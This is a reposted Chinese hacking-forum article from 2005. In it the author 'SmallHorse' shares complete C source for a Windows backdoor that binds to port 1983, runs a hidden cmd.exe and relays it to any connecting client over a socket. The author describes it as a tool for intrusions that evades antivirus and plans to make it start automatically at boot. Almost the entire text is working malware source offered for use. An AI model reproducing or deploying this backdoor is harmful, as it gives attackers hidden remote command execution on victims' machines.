本文共 3454 字,大约阅读时间需要 11 分钟。
文章作者: 小马/SmallHorse [E.S.T VIP](这个E.S.T VIP写不写是无所谓的) 信息来源: 邪恶八进制 中国 最近闲着无聊,自己琢磨着写了个简单的CMDSHELL后门。同时也避免了入侵时被杀毒软件K了。参考了T-CMD源代码和以前黑防的相关文章。从中学到了很多知识。 程序很简单,运行后默认打开1983端口,也可以自己设定端口,等待客户端来连接。连接可以使用nc。本来还想设计成服务让其开机后自动运行,由于时间问题等以后完善了。 用法:smallhorse [-p port] -p参数用于设置自己的端口 下面是源程序,贴出来和大家共同学习进步,同时希望高手不吝指教,小马在此谢了先。 QQ:11189658 E-MAIL: 在vc++6.0 WIN2003下编译通过 #i nclude<winsock2.h> #i nclude <stdio.h> #pragma comment (lib, "Ws2_32.lib") int port=1983; DWORD WINAPI ClientThread(LPVOID lpParam); void Help() {printf(" /***************************************\\\n"); printf(" |This SmallHorse's First CMDSHELL V0.1 |\n"); printf(" |Thanks For Using It! |\n"); printf(" |SmallHorse [E.S.T] VIP 2005.03 |\n"); printf(" |***************************************|\n"); printf(" |usage:smallhorse [-p port] |\n"); printf(" | port: Port Number To Listen On |\n"); printf(" | Default Port Is 1983 |\n"); printf(" \\***************************************/\n"); return; } void OpenDoor() { // 初始化 Winsock. WSADATA wsaData; SOCKET m_socket,AcceptClient; sockaddr_in Service,Client; int ClientSize,i=0; int iResult = WSAStartup( MAKEWORD(2,2), &wsaData ); if ( iResult != NO_ERROR ) return; // 创建一个 socket. m_socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); if(m_socket==SOCKET_ERROR) return; Service.sin_family = AF_INET; Service.sin_addr.s_addr = htonl(INADDR_ANY); Service.sin_port = htons( port ); if(bind( m_socket, (SOCKADDR*)&Service, sizeof(Service) )==SOCKET_ERROR) return;//邦定 if (listen(m_socket,5)==SOCKET_ERROR) return;//最大监听列队5个 printf("\nsmallhorse Listen On Port: %d... ^*^\n",port); ClientSize=sizeof(Client); while(1) { AcceptClient=accept(m_socket,(SOCKADDR*)&Client,&ClientSize); if(AcceptClient==SOCKET_ERROR) return;//接受连接 printf( "Client Connected.\n"); char *sendbuf = "/***************************************\\\n\tThanks For Using...\n\tSmallHorse's CmdShell!\n\tGood Luck!\n\\***************************************/\n\n"; send( AcceptClient, sendbuf, strlen(sendbuf), 0 ); if(CreateThread(NULL,0,ClientThread,(LPVOID)&AcceptClient,0,NULL)==NULL) printf("Create Thread Error!\n"); Sleep(1000); } WSACleanup(); return; } DWORD WINAPI ClientThread(LPVOID lpParam) {int ret; char Buf[1024]; HANDLE Rpipe,Wpipe,Wfile,Rfile; SOCKET AcceptClient=(SOCKET)*(SOCKET*)lpParam; SECURITY_ATTRIBUTES sa; sa.nLength=sizeof(sa); sa.bInheritHandle=TRUE; sa.lpSecurityDescriptor=NULL; ret=CreatePipe(&Rpipe,&Rfile,&sa,0); ret=CreatePipe(&Wfile,&Wpipe,&sa,0); //建立两个管道,分别用于接收命令和显示结果 STARTUPINFO startinfo; GetStartupInfo(&startinfo); startinfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; startinfo.hStdInput=Wfile; startinfo.hStdError=startinfo.hStdOutput=Rfile; startinfo.wShowWindow=SW_HIDE; char cmdline[MAX_PATH]; GetSystemDirectory(cmdline,MAX_PATH); strcat(cmdline,("\\cmd.exe")); PROCESS_INFORMATION proinfo; ret=CreateProcess(cmdline,NULL,NULL,NULL,1,0,NULL,NULL,&startinfo,&proinfo); unsigned long ByteRec; while(1) { Sleep(100); PeekNamedPipe(Rpipe,Buf,1024,&ByteRec,0,0); if(ByteRec){ ret=ReadFile(Rpipe,Buf,ByteRec,&ByteRec,0); if(!ret) break; ret=send(AcceptClient,Buf,ByteRec,0); if(ret<=0) break; } else{ ByteRec=recv(AcceptClient,Buf,1024,0); if(ByteRec<=0) break; ret=WriteFile(Wpipe,Buf,ByteRec,&ByteRec,0); if(!ret) break; } } return 0; } int main(int argc, char *argv[]) { Help(); if(argc==3) if(!strcmp(argv[1],"-p")) port=atoi(argv[2]); OpenDoor(); return 0; }
本文转自loveme2351CTO博客,原文链接:http://blog.51cto.com/loveme23/7951 ,如需转载请自行联系原作者